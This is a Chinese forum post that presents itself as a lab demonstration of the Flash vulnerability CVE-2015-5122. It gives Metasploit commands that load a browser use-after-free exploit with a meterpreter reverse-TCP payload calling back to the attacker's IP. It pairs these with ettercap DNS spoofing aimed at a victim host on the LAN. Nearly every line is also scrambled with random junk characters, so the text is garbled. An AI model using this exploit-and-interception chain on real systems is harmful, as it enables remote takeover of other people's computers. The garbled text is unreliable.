找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1548|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

: F$ B1 Q! Q; w# f) J4 V 二、cve2015-5122漏洞实例演示虚拟机 # L8 h4 m F/ A+ g

; P1 o# G, \7 I) f1 f5 P+ J

6 ~- K) X( b: V   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ; ~) Q: y2 P, C! M

2 n8 U7 Y1 Y/ j; `" O9 [+ R E

/ p7 t3 j4 p% K% a1 ?. @* ~ search cve-2015-5122如图: * i1 ~% f0 }$ W: O2 ?# N

' U* `& m7 c6 r" t5 c. T0 l9 g

* r8 [4 n1 W8 H1 Q. D7 k   ; H- {( k, d& X! O! z

: Y8 z( M# e# G* _: d: X- H9 n

' [9 H) K2 T A; b* R( J/ L 下面我们敲如下命令: / `1 F, c y# r! y- S: Z# k

. V, n, V3 u* Q5 G" l" t

. K k/ k; l$ E( G$ [, v use exploit/multi/browser/adobe_flash_opaque_background_uaf $ I; n5 H. J% H( [& n

F- N% o% R9 j: o9 I

) w+ @5 h Y4 @+ ^$ V! Q; ^ set PAYLOAD windows/meterpreter/reverse_tcp 3 @; y; D/ ?$ u! ?7 n( ~7 d

3 v! ~: }6 I$ ^& G/ h+ a4 r3 [

" ~' V7 n" g( [ u8 l8 d set LHOST 192.168.0.109 ' d8 x0 T: N, z5 Q l, W

, ]1 M+ D8 m! J8 F& d; R* W+ B8 ?1 F

K& I4 t, O, |; u3 R, h$ ^ set URIPATH /                        /*根目录*/ + ~$ b0 z/ o- u

( A( A. w: B1 @/ F

- E$ J: Z# L% h$ m# r% s8 K) P/ d set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 0 s) x% z+ ^- ^

9 W8 f8 P9 @' r3 ^1 i+ _

) G7 x V& L5 |) d; Y set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 0 a7 t# Y0 h% ~/ o

+ t+ H, v" f9 |! d# p8 b4 n

3 a5 h# c4 F- |$ q& H# B 然后show options如图: 0 n7 n4 |: l, U; B4 K, K' Y0 |

c4 w6 | I# ~* z2 j9 b

7 P- l, |" m* k' @   ( X5 V; ^% I3 D, B' h: K

; f. G0 g" D5 s! p( w! q4 B

- J9 }2 N0 z/ L2 _2 b 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
4 P7 I) _0 E/ Z' \) P
+ U/ M5 v3 Q+ ^' V* o, ?* `- J8 a

. r* d2 `/ Y4 D2 e/ U% C

$ b/ u# n: u- [+ S; W4 m 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 / o+ Z; _5 Y- m& B& j$ P8 d

9 J8 L4 a, B3 Q

, B4 \/ _! X8 f4 e Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf v/ j# t6 D3 H* _, T, s& _

7 D; m' @% s! a2 G

8 S6 ?" g5 D. D e   . K X1 v! t& o. ?) g

8 \+ x! |) h% c# X/ x! |' V

) ^$ O# I4 l* f0 ^ 成功了,这时候我们断开ettercap,如图: 4 u. ?0 [ i2 D

' ^# k4 {% P4 C- o7 m6 W# Y, ~/ }4 U C [

/ G5 m+ c+ l* |& V/ ~2 k   Y; G F" W8 W% D

! U1 ?, w& K7 X

: z2 c" H* j, Q: ]1 A Screenshot如图: 1 ~1 d) P" B; M' T" i# c; H0 ?- ^

/ s) O! s1 P/ g

* A- O& z, s2 `: d   % [! o4 y3 j, q* {8 Z" K

- P+ h7 t9 J6 p' N" r* b

! e% {' S7 i3 M; k& m ? % c9 [+ Q: g2 s, L7 U2 F. f

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表